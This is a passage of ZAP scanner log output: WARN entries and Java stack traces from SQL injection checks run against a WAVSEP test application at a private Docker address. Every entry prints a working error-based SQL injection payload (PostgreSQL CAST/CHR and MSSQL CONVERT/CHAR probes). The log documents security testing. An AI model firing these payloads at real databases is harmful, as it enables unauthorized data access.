THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (5088=5088] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 8490=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8490=8490) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (5088=5088 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679229 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 6069=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6069=6069) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('xILd'='xILd] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 6069=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6069=6069) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('xILd'='xILd at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679229 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 4273=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4273=4273) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 4273=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4273=4273) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679230 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 1776=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1776=1776) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'ADRe'='ADRe] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 1776=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1776=1776) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'ADRe'='ADRe at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679231 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 1656=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1656=1656) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('HCAI'='HCAI] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 1656=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1656=1656) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('HCAI'='HCAI at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679232 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 2241=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2241=2241) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 2241=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2241=2241) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679233 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 1832=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1832=1832) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'aPtA'='aPtA] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 1832=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1832=1832) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'aPtA'='aPtA at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679233 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 2683=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2683=2683) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- ySnj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 2683=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2683=2683) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- ySnj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679234 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 2953=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2953=2953) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 2953=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2953=2953) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679235 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 3847=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3847=3847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (5146=5146] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 3847=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3847=3847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (5146=5146 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679236 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 4048=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4048=4048) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- jKVS] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 4048=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4048=4048) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- jKVS at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679236 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 3724=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3724=3724) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 3724=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3724=3724) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at 